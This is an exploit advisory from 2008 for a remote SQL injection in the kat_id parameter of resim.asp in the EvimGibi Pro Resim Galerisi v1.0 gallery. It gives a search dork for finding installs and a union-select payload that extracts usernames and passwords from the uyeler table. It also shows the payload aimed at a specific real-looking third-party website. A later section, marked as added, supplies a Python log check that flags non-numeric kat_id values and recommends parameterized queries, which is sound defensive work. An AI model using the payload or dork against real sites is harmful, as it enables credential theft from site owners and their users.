EvimGibi Pro Resim Galerisi version 1.0 suffers from a remote SQL injection vulnerability.
e8f5f29204963b8d74595cdf4d48b630601e20142e1af996f81579d2fd52400a
EvimGibi Pro Resim Galerisi v1.0 (tr)
resim.asp (kat_id) Remote SQL Injection
download: http://www.aspindir.com/indir.asp?id=4868&sIslem=İndir
dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo
dork: intext:"Asp Programlama : EvimGibi"
author: ZoRLu
home: z0rlu.blogspot.com
contact: trt-turk@hotmail.com
date: 28/10/2008
n0te: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
n0te: damn KPSS : ) )
exploit:
http://localhost/script_path/resim.asp?islem=altkat&kat_id=[SQL]
[SQL]=
-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler
example:
http://www.sabanciogretmenevi.com.tr/album/resim.asp?islem=altkat&kat_id=-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler
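detection (added example, not part of the original advisory): a log check that flags requests to resim.asp whose kat_id is not a plain integer. It assumes kat_id is meant to be a numeric category id and that IIS writes W3C extended logs; the log lines and IP addresses are constructed.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log sample; documentation-range IPs, not real traffic.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2008-10-28 10:01:02 GET /album/resim.asp islem=altkat&kat_id=7 192.0.2.10 200
2008-10-28 10:01:09 GET /album/resim.asp islem=altkat&kat_id=-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler 192.0.2.66 200
2008-10-28 10:01:15 GET /album/resim.asp islem=altkat&kat_id=12%20OR%201%3D1 192.0.2.66 500
2008-10-28 10:01:20 GET /album/default.asp - 192.0.2.10 200
2008-10-28 10:01:31 GET /album/RESIM.ASP islem=altkat&kat_id=3&kat_id=x 192.0.2.77 200
"""

# Assumption: a legitimate kat_id is a short non-negative decimal number.
VALID_ID = re.compile(r"[0-9]{1,9}")


def suspicious_requests(log_text, page="resim.asp", param="kat_id"):
    """Return (client_ip, status, decoded_value) for each non-numeric param."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for later rows
            continue
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        # IIS paths are case-insensitive, so compare in lower case.
        if not rec.get("cs-uri-stem", "").lower().endswith("/" + page):
            continue
        # parse_qs decodes '+' and %XX, so encoded payloads are compared
        # in the form the script would receive them.
        values = parse_qs(rec.get("cs-uri-query", ""),
                          keep_blank_values=True).get(param, [])
        # Classic ASP joins repeated parameters with ", ", so every
        # occurrence has to be numeric, not only the first one.
        bad = [v for v in values if not VALID_ID.fullmatch(v)]
        if bad:
            hits.append((rec.get("c-ip"), rec.get("sc-status"), bad[0]))
    return hits


if __name__ == "__main__":
    for ip, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} status={status} kat_id={value!r}")
```

The same integer-only rule belongs in resim.asp itself, before kat_id reaches the query, preferably together with a parameterized ADODB.Command.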